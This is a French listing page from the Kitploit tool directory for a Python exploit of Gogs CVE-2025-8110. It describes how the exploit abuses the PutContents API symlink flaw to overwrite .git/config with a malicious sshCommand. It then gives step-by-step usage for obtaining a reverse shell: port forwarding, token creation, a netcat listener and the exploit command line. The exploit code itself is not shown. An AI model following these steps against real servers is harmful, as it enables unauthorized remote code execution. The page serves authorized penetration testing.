Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCE Exploit | Kitploit
Outils/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCE Exploit

Voir le dépôt
13il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE pour Gogs CVE-2025-8110

Un exploit Python automatisé pour CVE-2025-8110 dans Gogs. Cette vulnérabilité permet l'exécution de code à distance (RCE) en abusant de l'API PutContents, qui ne valide pas si un chemin de fichier est un lien symbolique. En écrasant le fichier interne .git/config via un lien symbolique, nous pouvons injecter une sshCommand malveillante pour déclencher un reverse shell.

🛠️ Prérequis

Assurez-vous d'avoir Python 3 et les dépendances nécessaires installées :

root@kitploit:~
pip install requests rich beautifulsoup4

Vous devez également avoir git installé et accessible dans votre $PATH pour la phase de clonage et de commit du dépôt.

⚙️ Configuration

1. Accéder à l'interface Web de Gogs

Gogs peut être lié à 127.0.0.1:3001. Utilisez le forwarding de port pour accéder à l'interface Web localement :

root@kitploit:~
ssh -L 3001:127.0.0.1:3001 user@target-ip

2. Création de compte

Une fois le forwarding effectué, accédez à http://localhost:3001 :

  • Créez un nouveau compte.
  • Notez votre nom d'utilisateur et mot de passe pour le script.

3. Génération du jeton API

Le script utilise l'API Gogs pour délivrer la charge utile :

  1. Connectez-vous à l'interface Web.
  2. Allez dans Paramètres -> Applications.
  3. Sous Gérer les jetons d'accès personnel, générez un nouveau jeton.
  4. Copiez le jeton immédiatement.

🚀 Exécution

1. Démarrer un écouteur Netcat

Démarrez votre écouteur avant d'exécuter le script, car le shell se déclenche dès que la mise à jour de l'API est traitée.

root@kitploit:~
nc -lvnp 5555

2. Exécuter l'exploit

Passez vos identifiants et le jeton en arguments :

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555

Arguments

OptionDescription
-uL'URL de base de l'instance Gogs (ex. http://localhost:3001).
-unLe nom d'utilisateur du compte créé.
-pwLe mot de passe du compte créé.
-tLe jeton API généré dans les paramètres.
-lhL'adresse IP de votre écouteur (LHOST).
-lpLe port de votre écouteur (LPORT).

Note : Si le script se bloque ou renvoie un Read timed out après "Overwriting .git/config", vérifiez votre écouteur. Cela indique généralement que le reverse shell s'est connecté avec succès et maintient la connexion.


Auteur : TYehan

Avertissement : Cet outil est destiné à des fins éducatives et à des audits de sécurité autorisés uniquement. Utilisez-le de manière responsable.

Télécharger l’outil